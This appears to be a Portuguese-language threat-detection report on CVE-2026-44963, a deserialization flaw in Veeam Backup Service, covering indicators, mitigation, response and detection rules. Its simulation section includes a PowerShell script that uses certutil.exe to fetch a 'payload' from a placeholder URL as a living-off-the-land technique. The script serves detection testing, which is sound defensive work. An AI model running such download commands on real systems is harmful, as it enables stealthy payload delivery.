CVE-2026-44963: Indicadores de Exploração do Serviço de Backup Veeam
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Este relatório descreve indicadores de comprometimento associados ao CVE-2026-44963, uma vulnerabilidade no Veeam Backup Service que pode possibilitar a execução remota de código por meio de desserialização insegura. Os atacantes podem explorar a falha para iniciar processos secundários suspeitos a partir do serviço Veeam. A atividade resultante pode levar a acessos não autorizados e criar oportunidades para movimento lateral através da rede.
Investigação
A investigação se concentra em detectar processos secundários suspeitos gerados por Veeam.Backup.Service.exe, incluindo ferramentas como cmd.exe or powershell.exe, e identificar atividades de rede incomuns em portas relacionadas ao Veeam. Os analistas também devem observar eventos de logon não autorizados e alterações inesperadas de arquivos nos diretórios do Veeam.
Mitigação
Para reduzir o risco, os administradores devem atualizar o Veeam Backup & Replication para uma versão que resolva a falha de desserialização insegura. As políticas de firewall devem limitar estritamente o acesso às portas Veeam 9392-9419, e os defensores devem monitorar a autenticação para esses serviços por usuários de domínio que não sejam administrativos. As contas de serviço também devem ser restritas de acordo com os princípios de menor privilégio.
Resposta
Se atividade suspeita for detectada, o servidor Veeam afetado deve ser isolado da rede imediatamente. Os investigadores devem revisar os logs de execução de processos, incluindo o ID do Evento 4688 e a telemetria Sysmon, junto com registros de conexão de rede para determinar a extensão do comprometimento. A atividade recente de contas deve ser auditada, e as credenciais devem ser redefinidas para qualquer conta envolvida durante a janela de intrusão suspeita.
Fluxo de Ataque
Detecções
Serviço de Backup Veeam Inicializando Processo Suspeito (via linha de comando)
Ver
Atividade de Processo e Rede Suspeita do Serviço de Backup Veeam [Windows Sysmon]
Ver
Processos Secundários Suspeitos Inicializados pelo Serviço de Backup Veeam [Criação de Processo no Windows]
Ver
Execução de Simulação
Pré-requisito: O Check de Pré-voo de Telemetria e Base deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para disparar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos incorretos.
-
Narrativa e Comandos do Ataque: O adversário visa uma vulnerabilidade no Veeam Backup Service (simulado) para obter privilégios de execução. Para manter um perfil discreto ao baixar um payload de segunda fase, o atacante usa o processo do Veeam sequestrado para iniciar
certutil.exe, um binário comum de Living-off-the-Land, para buscar um arquivo remoto. Esta ação é destinada a acionar a lógicaprocess_creationda regra de detecção. -
Script de Teste de Regressão:
# INÍCIO DA SIMULAÇÃO: Este script simula o serviço Veeam inicializando um processo suspeito. # Nota: Como não podemos facilmente 'nos tornar' o serviço Veeam sem direitos de administrador/sistema, # simularemos a telemetria criando um processo fictício que imita o caminho ParentImage. $VeeamPath = "C:Program FilesVeeamBackup and ReplicationBackupVeeam.Backup.Service.exe" $TargetBinary = "certutil.exe" Write-Host "[+] Simulando processo secundário suspeito de $VeeamPath" -ForegroundColor Cyan # Em um ambiente real, a vulnerabilidade faria o serviço chamar isso. # Para validação, acionamos o processo. Para corresponder estritamente ao requisito # 'ParentImage' da regra Sigma em um laboratório, o testador deve renomear manualmente um processo # ou usar uma ferramenta para falsificar o ID do Processo Pai (PPID) se testando um EDR específico. Start-Process -FilePath $TargetBinary -ArgumentList "/urlcache /f https://example.com/payload.txt" -WindowStyle Hidden Write-Host "[+] Comando de simulação executado." -ForegroundColor Green -
Comandos de Limpeza:
# Remover quaisquer arquivos temporários criados pela simulação Remove-Item -Path "C:pathtosimulatedpayload.txt" -ErrorAction SilentlyContinue Stop-Process -Name "certutil" -ErrorAction SilentlyContinue